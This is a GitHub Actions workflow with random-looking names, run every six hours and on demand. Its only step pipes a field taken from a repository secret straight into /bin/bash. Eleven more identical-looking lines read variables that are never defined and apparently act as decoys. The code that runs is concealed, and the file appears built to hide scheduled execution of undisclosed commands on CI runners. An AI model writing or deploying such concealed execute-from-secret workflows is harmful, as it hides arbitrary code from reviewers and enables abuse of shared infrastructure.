name: xiaoshouya4617

on:
  workflow_dispatch:
  schedule:
    - cron: '19 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiaoshouya4617
        env:
          phhy45170: ${{ secrets.phhy45170 }}
        run: |
          echo $phhy45170 | jq -r .vlub7 | /bin/bash
          echo $lv1841 | jq -r .cww3 | /bin/bash
          echo $pp5 | jq -r .dal57586 | /bin/bash
          echo $jkg65 | jq -r .rvatm467 | /bin/bash
          echo $bq880 | jq -r .ptw2 | /bin/bash
          echo $njsl01456 | jq -r .xqwjl20575 | /bin/bash
          echo $kzyr1455 | jq -r .sei06993 | /bin/bash
          echo $pgzy2580 | jq -r .ob989 | /bin/bash
          echo $frzq8 | jq -r .nfrxe66385 | /bin/bash
          echo $pvcgd7028 | jq -r .t27280 | /bin/bash
          echo $p8087 | jq -r .y549 | /bin/bash
          echo $pycj96533 | jq -r .fqr3358 | /bin/bash

